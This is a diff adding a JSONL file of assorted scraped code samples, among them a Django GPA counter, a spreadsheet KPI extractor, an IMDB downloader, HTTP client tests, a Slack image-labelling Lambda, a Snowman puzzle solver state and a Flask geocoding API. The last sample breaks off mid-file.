diff --git "a/4997.jsonl" "b/4997.jsonl" new file mode 100644--- /dev/null +++ "b/4997.jsonl" @@ -0,0 +1,733 @@ +{"seq_id":"331668728","text":"from django import forms\nfrom .models import Choice\n\nclass ChoiceForm(forms.Form):\n\n class Meta:\n model = Choice()\n\n def __init__(self, question, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n for choice in question.choice_set.all():\n field = forms.IntegerField(min_value=0, max_value=9, label=choice.choice_text, initial=\"0\")\n self.fields[\"resistance_value_%s\" % choice.id ] = field\n","sub_path":"polls/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"648450093","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nimport re\nfrom counter.models import Student\nfrom django.http import Http404\nimport hashlib\n\n\n# Create your views here.\ndef index(request):\n \"\"\"インデクスページの表示\"\"\"\n return render(request, 'counter/index.html', {})\n\n\ndef result(request):\n \"\"\"結果の表示\"\"\"\n 基礎教養 = 0.0\n 総合教養 = 0.0\n 高度教養 = 0.0\n 外国語1 = 0.0\n 外国語2 = 0.0\n 健康スポーツ = 0.0\n 情報基礎 = 0.0\n 丸1 = 0.0\n 丸2 = 0.0\n 丸3 = 0.0\n 丸 = 0.0\n flag = 0\n units = 0.0\n gp = 0.0\n gpa = 0.0\n special_units = 0.0\n special_gp = 0.0\n special_gpa = 0.0\n\n name_maru1 = [\"力学基礎1\", \"微分積分1\", \"線形代数1\", \"プログラミング演習1\", \"初年次セミナー\", \"力学基礎2\", \"微分積分2\", \"線形代数2\", \"プログラミング演習2\", \"離散数学\", \"応用解析学\", \"微分積分3\", \"線形代数3\", \"電磁気学基礎1\", \"プログラミング演習3\", \"微分積分4\", \"線形代数4\", \"電磁気学基礎2\", \"プログラミング演習4\", \"物理学実験\", \"常微分方程式論\", \"応用アルゴリズム演習\", \"複素関数論\", \"数値解析\", \"総合演習A1\", \"総合実験A1\", \"総合実験A2\", \"総合演習A2\", \"総合実験B1\", \"総合演習B1\", \"総合実験B2\", \"総合演習B2\"]\n name_maru2 = [\"電気回路及び演習1\", \"電気回路及び演習2\", \"アルゴリズム・データ構造\", \"データ解析1\", \"アルゴリズム・データ構造演習\", \"データ解析2\", \"制御工学及び演習1\", \"数理計画及び演習1\", \"信号解析1\", \"データ解析演習\", \"制御工学及び演習2\", \"数理計画及び演習2\", \"信号解析2\", \"信号解析演習\"]\n name_maru3 = [\"情報・通信ネットワーク\", \"論理回路\", \"計算機概論\", \"波動と振動\", \"システムモデル\", \"確率と統計\", \"コンピュータシステム1\",\"現象計算\", \"ソフトウェア工学\", \"言語工学\", \"コンピュータシステム2\", \"ロボティクス\", \"設計工学\", \"電子回路\", \"並列計算\", \"卒業研究\"]\n name_maru = [\"情報数学\", \"オペレーションズリサーチ\", \"現代制御\", \"情報管理\", \"知識工学\", \"マクロ系計算\", \"ミクロ系計算\", \"ソフトウェア開発1\", \"ソフトウェア開発2\", \"センシングとメカトロニクス\", \"メディア情報処理\", \"光情報工学\", \"ディジタル信号処理\", \"HPC\"]\n\n text = request.POST.get('grade_book')\n try:\n lines_before = text.splitlines()\n except:\n raise Http404\n\n\n if(lines_before[0].split()[-1] != \"単位修得状況照会\"):\n raise Http404\n\n for line in lines_before:\n lines_after = line.split()\n\n if(len(lines_after) < 4):\n continue\n\n if(lines_after[-2] == \"学籍番号\"):\n student_id = lines_after[-1]\n\n if(lines_after[0] == \"No.\"):\n flag = 1\n continue\n if(flag == 1):\n if(lines_after[1] == \"全学共通授業科目\"):\n if(lines_after[2] == \"基礎教養科目\"):\n 基礎教養 += float(lines_after[-6])\n units += float(lines_after[-6])\n gp += float(lines_after[-2])\n\n if(lines_after[2] == \"総合教養科目\"):\n 総合教養 += float(lines_after[-6])\n units += float(lines_after[-6])\n gp += float(lines_after[-2])\n\n if(lines_after[2] == \"外国語科目\"):\n if(re.match(r\"U1CA\", lines_after[3]) and (lines_after[4] != \"Autonomous\")):\n 外国語1 += float(lines_after[-6])\n units += float(lines_after[-6])\n gp += float(lines_after[-2])\n\n elif(lines_after[4] == \"Autonomous\"):\n 外国語1 += float(lines_after[-6])\n\n else:\n 外国語2 += float(lines_after[-6])\n units += float(lines_after[-6])\n gp += float(lines_after[-2])\n\n 
if(lines_after[2] == \"情報科目\"):\n 情報基礎 += float(lines_after[-6])\n\n if(lines_after[2] == \"健康・スポーツ科学\"):\n 健康スポーツ += float(lines_after[-6])\n units += float(lines_after[-6])\n gp += float(lines_after[-2])\n\n if (lines_after[1] == \"高度教養科目\"):\n 高度教養 += float(lines_after[-6])\n units += float(lines_after[-6])\n gp += float(lines_after[-2])\n\n if (lines_after[1] == \"専門科目\"):\n if(lines_after[-7] in name_maru1):\n 丸1 += float(lines_after[-6])\n if((lines_after[-2] != \"─\") and (not re.match(r\"U1\", lines_after[3]))):\n special_units += float(lines_after[-6])\n special_gp += float(lines_after[-2])\n\n if(lines_after[-7] in name_maru2):\n 丸2 += float(lines_after[-6])\n if(lines_after[-2] != \"─\"):\n special_units += float(lines_after[-6])\n special_gp += float(lines_after[-2])\n\n if(lines_after[-7] in name_maru3):\n 丸3 += float(lines_after[-6])\n if (lines_after[-2] != \"─\"):\n special_units += float(lines_after[-6])\n special_gp += float(lines_after[-2])\n\n if(lines_after[-7] in name_maru):\n 丸 += float(lines_after[-6])\n if (lines_after[-2] != \"─\"):\n special_units += float(lines_after[-6])\n special_gp += float(lines_after[-2])\n\n try:\n special_gpa = round(special_gp / special_units, 2)\n except:\n special_gpa = 0\n\n special_gp = round(special_gp, 2)\n entrance_year = int(\"20\"+student_id[0:2])\n #student_id_hashed = 適当にハッシュ化している。\n\n #DB更新\n try:\n student=Student.objects.create(student_id=student_id_hashed, special_units=special_units, special_gp=special_gp, special_gpa=special_gpa, entrance_year=entrance_year)\n #print(\"初使用\")\n except:\n #print(\"2回目以降\")\n student = Student.objects.get(student_id=student_id_hashed)\n student.delete()\n student=Student.objects.create(student_id=student_id_hashed, special_units=special_units, special_gp=special_gp, special_gpa=special_gpa, entrance_year=entrance_year)\n\n q = Student.objects.filter(special_gp__gt=special_gp, entrance_year__iexact=entrance_year)\n #ranking = Student.objects.raw('SELECT count(*) FROM counter_student WHERE special_gp > (SELECT special_gp FROM counter_student WHERE counter_student.student_id = %s)', student_id_hashed)\n all = Student.objects.filter(entrance_year__iexact=entrance_year)\n rank = len(q) + 1\n num = len(all)\n params = {\n '基礎教養': 6.0-基礎教養,\n '総合教養': 6.0-総合教養,\n '高度教養進級単位': 2.0-高度教養,\n '高度教養卒業単位': 4.0-高度教養,\n '外国語1': 6.0-外国語1,\n '外国語2': 4.0-外国語2,\n '健康スポーツ': 1.0-健康スポーツ,\n '情報基礎': 1.0-情報基礎,\n '丸1': 33.5-丸1,\n '丸2進級単位': 11.5-丸2,\n '丸3進級単位': 26-丸3,\n '丸2と丸3進級単位': 39.5-(丸2 + 丸3),\n '丸2卒業単位': 13.5-丸2,\n '丸3卒業単位': 38-丸3,\n '丸進級単位': 5-丸,\n '丸卒業単位': 11-丸,\n '専門GP': special_gp,\n '専門単位数': special_units,\n '専門GPA': special_gpa,\n '基礎教養進級': 基礎教養 > 5,\n '総合教養進級': 総合教養 > 5,\n '高度教養進級': 高度教養 > 1,\n '高度教養卒業': 高度教養 > 3,\n '外国語1進級': 外国語1 > 5,\n '外国語2進級': 外国語2 > 3,\n '健康スポーツ進級': 健康スポーツ > 0,\n '情報基礎進級': 情報基礎 > 0,\n '丸1進級': 丸1 >= 33.5,\n '丸2進級': 丸2 >= 11.5,\n '丸3進級': 丸3 >= 26,\n '丸2と丸3進級': (丸2 + 丸3) >= 39.5,\n '丸進級': 丸 >= 5,\n '丸2卒業': 丸2 >= 13.5,\n '丸3卒業': 丸3 >= 38,\n '丸卒業': 丸 >= 11,\n 'GPランク': rank,\n '人数': num,\n '入学年度': entrance_year\n }\n\n return render(request, 'counter/result.html', params)\n\n\ndef how(request):\n \"\"\"使用方法の表示\"\"\"\n return render(request, 'counter/how.html', {})\n","sub_path":"counter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"25394567","text":"import openpyxl\n# import os\n# print(os.getcwd())\nimport time\nstart_time = time.time()\n\nfile_name = 
['MTS_Summary_Financials_IFRS_final_v2.xlsm', 'MFON_Q4_2016.xlsx']\nworkbook = openpyxl.load_workbook(file_name[0])\nsheetsList = workbook.sheetnames\n# print(sheetsList)\n# sheet = workbook[sheetsList[1]]\n# print(sheet)\n\nsearch_word = 'revenue'\n\ndef KPI_position_search(KPI):\n # column = 0\n # while True:\n for column in range(1, 100):\n # column += 1\n for row in range(1, 200):\n # print(row, str(sheet.cell(row = row, column = column).value))\n if KPI.lower() in str(sheet.cell(row = row, column = column).value).lower():\n return row\n# print('KPI position row:{}'.format(KPI_position_search(search_word)))\n\n\ndef time_position_search():\n row = 0\n while True:\n row += 1\n for column in range(1, 100):\n # print(column, str(sheet.cell(row=row, column=column).value))\n if 'q1'.lower() in str(sheet.cell(row = row, column = column).value).lower():\n return (row, column)\n# print('Time position row:{} and column:{}'.format(time_position_search()[0],time_position_search()[1]))\n\n\ndef time_renaming():\n time_list = list()\n row_quarter = time_position_search()[0]\n column = time_position_search()[1]\n\n # if '20' in str(sheet.cell(row = row_quarter, column = column).value):\n # value_list.append(str(sheet.cell(row = row_quarter, column = column).value))\n # else:\n for row_year in range(1, row_quarter): # check where year is located\n if '20' in str(sheet.cell(row = row_year, column = column).value):\n while True:\n if sheet.cell(row = row_quarter, column = column).value == None:\n break\n else:\n time_list.append(str(sheet.cell(row = row_quarter, column = column).value) +\n str(sheet.cell(row = row_year, column = column).value))\n column += 1\n # print(time_list)\n\n year_index = [] # year_index shows location of values with year (e.g. 2015) in time_list\n for index in range(len(time_list)):\n if '20' in time_list[index]:\n # print(index)\n year_index.append(index)\n # print(year_index)\n diff = year_index[-1] - year_index[-2]\n\n time_list_cleaned = []\n for index in range(len(time_list)):\n # print(time_list[index])\n if '20' in time_list[index]:\n # print(index)\n for num in range(diff):\n # print([index + num], time_list[index + num])\n time_list_cleaned.append(time_list[index + num]\n .replace('None', time_list[index][-4:])\n .replace('*',''))\n return time_list_cleaned\n\n\ndef get_financials(KPI):\n try:\n if KPI_position_search(KPI) == None:\n quit()\n\n value_dictionary = dict()\n column = time_position_search()[1]\n while True:\n if sheet.cell(row = KPI_position_search(KPI), column = column).value == None:\n # if KPI_position_search(KPI) == None:\n # print(KPI_position_search(KPI))\n break\n if '20' in str(sheet.cell(row = time_position_search()[0], column = column).value):\n value_dictionary[str(sheet.cell(row = time_position_search()[0], column = column).value)] = str(sheet.cell(row = KPI_position_search(KPI), column = column).value)\n # print(value_dictionary[str(sheet.cell(row = time_position_search()[0], column = column).value)])\n column += 1\n else:\n for i in time_renaming():\n value_dictionary[i] = str(sheet.cell(row = KPI_position_search(KPI), column = column).value)\n column += 1\n return value_dictionary\n except:\n print('There is no \"{}\" on this sheet {}'.format(search_word, sheet))\n\n # return '{:,} mlnRUB'.format(sheet.cell(row = row_search(KPI), column = column_search()).value)\n# get_financials('service revenue')\n# print(get_financials(search_word))\n\nfor i in range(len(workbook.sheetnames)):\n sheet = workbook[sheetsList[i]]\n 
print(str(sheet).center(50, '='))\n print('KPI position row: {}'.format(KPI_position_search(search_word)))\n print(str(sheet), get_financials(search_word))\n\n\n\ndef run_time(start_time):\n end_time = time.time()\n scriptRunDuration = (end_time - start_time)/60 # in minutes # measure the execution time of a Python script\n timeString = str(scriptRunDuration).split('.')\n minutes = timeString[0]\n seconds = int(timeString[1]) * 60\n print('Took {} min and {} sec'.format(minutes, str(seconds)[:2]))\nrun_time(start_time)","sub_path":"mts_v3.py","file_name":"mts_v3.py","file_ext":"py","file_size_in_byte":4739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"213346045","text":"import requests\nimport threading\nfrom bs4 import BeautifulSoup\n\ndef descarga(codigo):\n URL = \"http://www.imdb.com/title/\"+codigo\n try:\n ans = requests.get(URL)\n pag = ans.content\n archivo_html = codigo+\".html\"\n with open (archivo_html,\"wb\") as archivo:\n archivo.write(pag)\n print(\"Archivo %s escrito\" % archivo_html)\n except OSError as e:\n print(archivo_html)\n print(e.strerror)\n\ndef lee(lista):\n for peli in lista:\n archivo = peli+\".html\"\n with open(archivo, \"r\") as archivo:\n html = archivo.read()\n soup = BeautifulSoup(html,\"html.parser\")\n titulo = soup.title.string\n descript = soup.findAll(\"div\",class_=\"inline canwrap\")\n print(titulo)\n print(descript[0].text)\n\n\ndef main():\n lista = [\"tt0068163\",\"tt0068164\",\"tt0068165\",\"tt0068166\",\"tt0068167\",\n \"tt0068168\",\"tt0068169\",\"tt0068170\",\"tt0068171\",\"tt0068172\",\n \"tt0068173\",\"tt0068174\",\"tt0068175\",\"tt0068176\",\"tt0068177\"]\n\n for page in lista:\n t1 = threading.Thread(target=descarga, args=(page,))\n t1.start()\n #pelis[]=page\n #Done\n #print(\"AcabÈ\")\n lee(lista)\n\nif __name__ == '__main__':\n main()\n","sub_path":"Trabajos Python/obtiene procesa busqueda/Descarga_paginas_html.py","file_name":"Descarga_paginas_html.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"211483572","text":"import pytest\nfrom httplib import HTTPException\nfrom geventhttpclient.httplib import HTTPConnection\nimport gevent.server\nfrom contextlib import contextmanager\n\nlistener = ('127.0.0.1', 54322)\n\n@contextmanager\ndef server(handler):\n server = gevent.server.StreamServer(\n listener,\n handle=handler)\n server.start()\n try:\n yield\n finally:\n server.stop()\n\ndef wrong_response_status_line(sock, addr):\n sock.recv(4096)\n sock.sendall('HTTP/1.1 apfais df0 asdf\\r\\n\\r\\n')\n\ndef test_httplib_exception():\n with server(wrong_response_status_line):\n connection = HTTPConnection(*listener)\n connection.request(\"GET\", '/')\n with pytest.raises(HTTPException):\n connection.getresponse()\n\ndef success_response(sock, addr):\n sock.recv(4096)\n sock.sendall(\"HTTP/1.1 200 Ok\\r\\n\"\n \"Content-Type: text/plain\\r\\n\"\n \"Content-Length: 12\\r\\n\\r\\n\"\n \"Hello World!\")\n\ndef test_success_response():\n with server(success_response):\n connection = HTTPConnection(*listener)\n connection.request(\"GET\", \"/\")\n response = connection.getresponse()\n assert response.should_keep_alive()\n assert response.message_complete\n assert not response.should_close()\n assert response.read() == 'Hello World!'\n assert response.content_length == 
12\n\n","sub_path":"src/geventhttpclient/tests/test_httplib.py","file_name":"test_httplib.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"20315228","text":"import os\nimport urllib\nimport boto3\n\n\n#input\nVERIFICATION_TOKEN = os.environ['VERIFICATION_TOKEN'] \nACCESS_TOKEN = os.environ['ACCESS_TOKEN'] \n\n\nSUPPORTED_TYPES = ['image/jpg', 'image/png', 'image/jpeg'] \nMAX_SIZE = 5242880 \nrekognition = boto3.client('rekognition')\n\n\ndef check_token(event):\n #Checks incoming token with existing token\n if event['token'] != VERIFICATION_TOKEN:\n print('Invalid token')\n return False\n return True\n\n\ndef confirm_event(event):\n #Validates image attributes and size\n\n event_details = event['event']\n file_subtype = event_details.get('subtype')\n file_details = event_details['file']\n mime_type = file_details['mimetype']\n file_size = file_details['size']\n\n if file_subtype != 'file_share':\n print('Not a file_shared event')\n return False\n if mime_type not in SUPPORTED_TYPES:\n print('File is not an image')\n return False\n if file_size > MAX_SIZE:\n print('Image is larger than 5MB')\n return False\n\n return True\n\n\ndef download_image(url):\n # Download image from private Slack URL using bearer token authorization.\n request = urllib.request.Request(url, headers={'Authorization': 'Bearer %s' % ACCESS_TOKEN})\n return urllib.request.urlopen(request).read()\n\n\ndef detect_attribute(image_bytes):\n # Checks image for label using Amazon Rekoginition\n try:\n response = rekognition.detect_labels(Image={'Bytes': image_bytes,},MinConfidence=80.0)\n except Exception as e:\n raise(e)\n labels = response['Labels']\n if any(label['Name'] == 'Animal' for label in labels):\n return True\n return False\n\n\ndef post_message(channel, message):\n #Posts message to Slack channel via Slack API.\n url = 'https://slack.com/api/chat.postMessage'\n data = urllib.parse.urlencode(((\"token\", ACCESS_TOKEN),(\"channel\", channel),(\"text\", message)))\n data = data.encode(\"ascii\")\n headers = {\"Content-Type\": \"application/x-www-form-urlencoded\"}\n request = urllib.request.Request(url, data, headers)\n urllib.request.urlopen(request)\n\n\ndef lambda_handler(event, context):\n if not check_token(event): \n return\n\n if event.get('challenge') is not None: \n challenge = event['challenge']\n return {'challenge': challenge}\n\n if not confirm_event(event): \n return\n #extract data \n event_details = event['event']\n file_details = event_details['file']\n channel = event_details['channel']\n url = file_details['url_private']\n file_id = file_details['id']\n\n image_bytes = download_image(url)\n is_animal = detect_attribute(image_bytes)\n message = \"\"\n if is_animal:\n print('Attribute detected')\n message = 'Wow!! Thats an Animal!!!'\n else:\n print('Attribute not detected')\n message = 'No. 
This is not an Animal.'\n post_message(channel, message)","sub_path":"lambda-method/wildlife_finder.py","file_name":"wildlife_finder.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"547944968","text":"\"\"\"Snowball routines.\n\n A) Class SnowmanState\n\n A specializion of the StateSpace Class that is tailored to the game of Snowball.\n\n B) class Direction\n\n An encoding of the directions of movement that are possible for robots in Snowball.\n\n Code also contains a list of 40 Snowball problems for the purpose of testing.\n\"\"\"\n\nfrom search import *\n\nclass SnowmanState(StateSpace):\n \n # a StateSpace with additional key attributes\n\n def __init__(self, action, gval, parent, width, height, robot, snowballs, obstacles, destination):\n \n #width: the width of the Snowman Puzzle board\n #height: the height of the Snowman Puzzle board\n #robot: position for the robot: a tuple (x, y), that denotes the robot's x and y position.\n \n #snowballs: positions for each snowball (or stack of snowballs) as keys of a dictionary. Each position is an (x, y) tuple. The value of each key is the index for that snowball's size (see below). Some values denote stacks of snowballs at a given location as well.\n \n #obstacles: locations of all of the obstacles (i.e. walls) on the board. Obstacles, like robots and snowballs, are also tuples of (x, y) coordinates.\n \n #destination: the target destination for the snowperson: a tuple (x, y), that denotes the desired position for the completed snowperson.\n \n #sizes: contains the key, value pairs that indicate snowball sizes or the presence of a snowball stack. The possible values are: ’b’ for a big snowball, ’m’ for a medium snowball, and ’s’ for a small one. A ’G’ denotes a completed snowperson. In addition, note that there are values to indicate stacks of snowballs on the board: ’A’ represents a medium snowball atop big one, ’B’ represents a small snowball atop big one and ’C’ represents a small snowball atop medium one. See Figure 2 for snowballs as they are represented by the ASCII visualizer you have been provided.\n \n \n\n\n StateSpace.__init__(self, action, gval, parent)\n self.width = width\n self.height = height\n self.robot = robot\n self.destination = destination \n self.snowballs = snowballs\n self.obstacles = obstacles\n \n #snowball sizes: 'b' is 'big', 'm' is 'medium' and 's' is small. \n #A type 'G' snowman is a complete snowman.\n #A type 'A' snowman is formed by placing a medium snowball atop big one.\n #A type 'B' snowman is formed by placing a small snowball atop medium one.\n #A type 'C' snowman is formed by placing a small snowball atop big one.\n self.snowball_sizes = {0: 'b', 1: 'm', 2: 's', 3: 'A', 4: 'B', 5: 'C', 6: 'G'} \n\n\n def successors(self):\n \n #This function generates a list of SnowmanStates that are successors to a given SnowmanState. 
Each state will be annotated by the action that was used to arrive at the SnowmanState up, down, left, right.\n \n successors = []\n transition_cost = 1\n\n for direction in (UP, RIGHT, DOWN, LEFT):\n\n new_location = direction.move(self.robot)\n \n #if the new location is outside of bounds, skip\n if new_location[0] < 0 or new_location[0] >= self.width:\n continue\n if new_location[1] < 0 or new_location[1] >= self.height:\n continue\n if new_location in self.obstacles:\n continue\n \n new_snowballs = dict(self.snowballs)\n index = 0\n\n if new_location in self.snowballs: #if the location we're going to is where there's a snowball\n new_snowball_location = direction.move(new_location) #move the snowball\n \n #snowball out of bounds?\n if new_snowball_location[0] < 0 or new_snowball_location[0] >= self.width:\n continue\n if new_snowball_location[1] < 0 or new_snowball_location[1] >= self.height:\n continue\n if new_snowball_location in self.obstacles:\n continue \n if self.snowball_sizes[new_snowballs[new_location]] == 'G': #can't move a complete Snowman \n continue \n\n #cases where bigger snowball is pushed atop smaller one(s) \n if new_snowball_location in new_snowballs: #if the new snowball location is where there's a snowball\n if self.snowball_sizes[new_snowballs[new_snowball_location]] == 'b' and self.snowball_sizes[new_snowballs[new_location]] == 'm':\n index = 3 #will transition to A formation of snowballs\n elif self.snowball_sizes[new_snowballs[new_snowball_location]] == 'm' and self.snowball_sizes[new_snowballs[new_location]] == 's':\n index = 4 #will transition to B formation of snowballs\n elif self.snowball_sizes[new_snowballs[new_snowball_location]] == 'b' and self.snowball_sizes[new_snowballs[new_location]] == 's':\n index = 5 #will transition to C formation of snowballs \n elif self.snowball_sizes[new_snowballs[new_snowball_location]] == 'A' and self.snowball_sizes[new_snowballs[new_location]] == 's':\n index = 6 #will transition to Goal formation of snowballs \n else:\n continue\n\n #cases where a stack of snowballs is pushed apart \n if self.snowball_sizes[new_snowballs[new_location]] == 'A':\n new_snowballs[new_location] = 0 #b\n new_snowballs[new_snowball_location] = 1 #m \n index = 7; \n if self.snowball_sizes[new_snowballs[new_location]] == 'B':\n new_snowballs[new_location] = 1 #m\n new_snowballs[new_snowball_location] = 2 #s \n index = 7; \n if self.snowball_sizes[new_snowballs[new_location]] == 'C':\n new_snowballs[new_location] = 0 #b\n new_snowballs[new_snowball_location] = 2 #s \n index = 7; \n\n if index == 0: #case robot has pushed one snowball\n index = new_snowballs.pop(new_location)\n elif index != 7: #case robot has pushed snowballs stack apart \n new_snowballs.pop(new_location)\n new_snowballs.pop(new_snowball_location)\n \n if index < 7: #case robot has pushed two snowballs together\n new_snowballs[new_snowball_location] = index\n \n if index == 7: #if robot pushed snowball stack apart, no movement of robot results\n new_robot = self.robot\n else:\n new_robot = tuple(new_location)\n\n new_state = SnowmanState(action=direction.name, gval=self.gval + transition_cost, parent=self,\n width=self.width, height=self.height, robot=new_robot,\n snowballs=new_snowballs, obstacles=self.obstacles, destination=self.destination)\n successors.append(new_state)\n\n return successors\n\n def hashable_state(self):\n \n #This is a function that calculates a unique index to represents a particular SnowmanState. 
It is used to facilitate path and cycle checking.\n\n\n return hash((self.robot, frozenset(self.snowballs.items())))\n\n\n def state_string(self):\n \"\"\"\n Return a string representation of a state that can be printed to stdout.\n\n \"\"\"\n map = []\n for y in range(0, self.height):\n row = []\n for x in range(0, self.width):\n row += [' ']\n map += [row]\n\n if self.robot in self.obstacles:\n print(\"error: robot is in list of obstacles\")\n\n if self.destination in self.obstacles:\n print(\"error: destination for snowman is in list of obstacles\")\n\n for obstacle in self.obstacles:\n map[obstacle[1]][obstacle[0]] = '#'\n\n map[self.destination[1]][self.destination[0]] = 'X'\n\n for snowball in self.snowballs:\n map[snowball[1]][snowball[0]] = self.snowball_sizes[self.snowballs[snowball]]\n if snowball in self.obstacles:\n print(\"error: snowball is in list of obstacles\")\n\n map[self.robot[1]][self.robot[0]] = '?'\n\n for y in range(0, self.height):\n map[y] = ['#'] + map[y]\n map[y] = map[y] + ['#']\n map = ['#' * (self.width + 2)] + map\n map = map + ['#' * (self.width + 2)] \n\n s = ''\n for row in map:\n for char in row:\n s += char\n s += '\\n'\n\n return s \n\n\n def print_state(self):\n #This function prints a SnowmanState to stdout (ASCII art FTW).\n print(\"ACTION was \" + self.action) \n print(self.state_string())\n\n\ndef removekey(d, key): \n r = dict(d)\n del r[key]\n return r\n\ndef snowman_goal_state(state):\n \"\"\"\n Returns True if we have reached a goal state.\n\n @param state: a Snowball state\n OUTPUT: True (if goal) or False (if not)\n \"\"\"\n for snowball in state.snowballs:\n if(state.snowball_sizes[state.snowballs[snowball]] == 'G' and snowball[1] == state.destination[1] and snowball[0] == state.destination[0]): #means a complete snowman is on the board and in the right spot\n return True\n return False \n\ndef generate_coordinate_rect(x_start, x_finish, y_start, y_finish):\n \"\"\"\n Generate tuples for coordinates in rectangle (x_start, x_finish) -> (y_start, y_finish)\n \"\"\"\n coords = []\n for i in range(x_start, x_finish):\n for j in range(y_start, y_finish):\n coords.append((i, j))\n return coords\n\n\"\"\"\nSnowball Directions: encodes directions of movement that are possible for each robot.\n\"\"\"\nclass Direction():\n \"\"\"\n A direction of movement.\n \"\"\"\n \n def __init__(self, name, delta):\n \"\"\"\n Creates a new direction.\n @param name: The direction's name.\n @param delta: The coordinate modification needed for moving in the specified direction.\n \"\"\"\n self.name = name\n self.delta = delta\n \n def __hash__(self):\n \"\"\"\n The hash method must be implemented for actions to be inserted into sets \n and dictionaries.\n @return: The hash value of the action.\n \"\"\"\n return hash(self.name)\n \n def __str__(self):\n \"\"\"\n @return: The string representation of this object when *str* is called.\n \"\"\"\n return str(self.name)\n \n def __repr__(self):\n return self.__str__()\n \n def move(self, location):\n \"\"\"\n @return: Moving from the given location in this direction will result in the returned location.\n \"\"\"\n return (location[0] + self.delta[0], location[1] + self.delta[1])\n\n\n#Global Directions\nUP = Direction(\"up\", (0, -1))\nRIGHT = Direction(\"right\", (1, 0))\nDOWN = Direction(\"down\", (0, 1))\nLEFT = Direction(\"left\", (-1, 0))\n\n\n\n 
\n","sub_path":"CSC384/Assignment1/snowman.py","file_name":"snowman.py","file_ext":"py","file_size_in_byte":11324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"382214644","text":"from __future__ import absolute_import\n\nimport json\nimport os\nfrom urlparse import urlparse\n\nfrom flask import Flask, render_template, request, redirect, session,jsonify, make_response\nfrom flask_sslify import SSLify\nfrom rauth import OAuth2Service\nimport requests\nimport urllib, urllib2\n\nfrom model import db\nfrom model import User\nfrom model import CreateDB\nfrom model import app as application\nfrom sqlalchemy.exc import IntegrityError,SQLAlchemyError\nimport os\n\napp = Flask(__name__)\napp.requests_session = requests.Session()\napp.secret_key = os.urandom(24)\n\nsslify = SSLify(app)\n\n#Location API's\n@app.route('/locations', methods=['GET'])\ndef show_addresses():\n all_addresses = g.db.execute('select id, nickname, location, latitude, longitude from addresses').fetchall()\n entries = [dict(id=address[0], nickname=address[1], location=address[2], latitude=address[3], longitude=address[4]) for address in all_addresses]\n return json.dumps(entries)\n\t\n@app.route('/locations', methods=['POST'])\ndef create_address():\n try:\n name = request.json['name']\n address = request.json['address']\n city = request.json['city']\n state = request.json['state']\n zip = request.json['zip']\n params = {\n 'address' : address+city+state,\n 'sensor' : 'false',\n } \n\n url = 'http://maps.google.com/maps/api/geocode/json?' + urllib.urlencode(params)\n response = urllib2.urlopen(url)\n result = json.load(response)\n \n place = result['results'][0]['geometry']['location']\n\n database = CreateDB(hostname='127.0.0.1')\n db.create_all()\n user = User(name,address,city,state,zip,place['lat'],place['lng'])\n db.session.add(user)\n db.session.commit()\n\n response = jsonify({'id':user.id,'name':request.json['name'], 'address':request.json['address'],'city':request.json['city'],'state':request.json['state'],'zip':request.json['zip'],\n 'coordinates':place})\n response.status_code = 201\n return response\n except IntegrityError as e:\n db.session.rollback()\n resp = jsonify({\"IntegrityError\": str(e)})\n resp.status_code = 403\n return resp\n except SQLAlchemyError as e:\n db.session.rollback()\n resp = jsonify({\"error\": str(e)})\n resp.status_code = 403\n return resp\n\n@app.route('/locations/')\ndef show_address(address_id):\n try:\n user = User.query.filter_by(id=address_id).first_or_404()\n return jsonify({'id':user.id, 'name':user.name, 'address':user.address,'city':user.city,'state':user.state,'zip':user.zip,'coordinates':{'lat':user.lat,'lng':user.lng}})\n except IntegrityError:\n resp = jsonify({\"IntegrityError\": str(e)})\n resp.status_code = 404\n return resp\n\n@app.route('/locations/', methods=['PUT'])\ndef edit_address(address_id):\n\ttry:\n\t\tuser = User.query.get(address_id)\n\t\tdata = json.loads(request.data)\n\t\tuser.name = data['name']\n\t\tdb.session.commit()\n\t\tresp = jsonify({\"result\":True})\n\t\tresp.status_code = 202\n\t\treturn resp\n\n\texcept IntegrityError as e:\n db.session.rollback()\n resp = jsonify({\"IntegrityError\": str(e)})\n resp.status_code = 403\n return resp\n\n@app.route('/locations/', methods=['DELETE'])\ndef delete_address(address_id):\n try:\n db.session.delete(User.query.get(address_id))\n db.session.commit()\n resp = jsonify({\"result\":True})\n resp.status_code = 204\n return resp\n\n except IntegrityError as 
e:\n resp = jsonify({\"IntegrityError\": str(e)})\n resp.status_code = 404\n return resp\n\n\nif __name__ == '__main__':\n app.debug = os.environ.get('FLASK_DEBUG', True)\n app.run(port=7000)\n","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"321197795","text":"from sklearn.model_selection import train_test_split\r\nfrom sklearn.neural_network import MLPClassifier\r\nimport numpy as np\r\nimport pandas as pd\r\nimport pickle\r\nimport torch\r\nimport argparse\r\n\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"--starting_rank\", required=True,help=\"starting rank for the classifier\", type=int)\r\nparser.add_argument(\"--ending_rank\", required=True,help=\"ending rank for the classifier, make sure it's not more than 1000+starting rank\", type=int)\r\nparser.add_argument(\"--model_name\", default=\"model\", help=\"model name where model will be saved, assumed this is consistent for language pairs\")\r\nparser.add_argument(\"--previous_scores\", default=\"wmt20-sent.en-ha.laser-score\", help=\"file where scores of the previous iteration are saved\")\r\nparser.add_argument(\"--current_scores\", default=\"scores.txt\", help=\"file where scores of the current iteration are 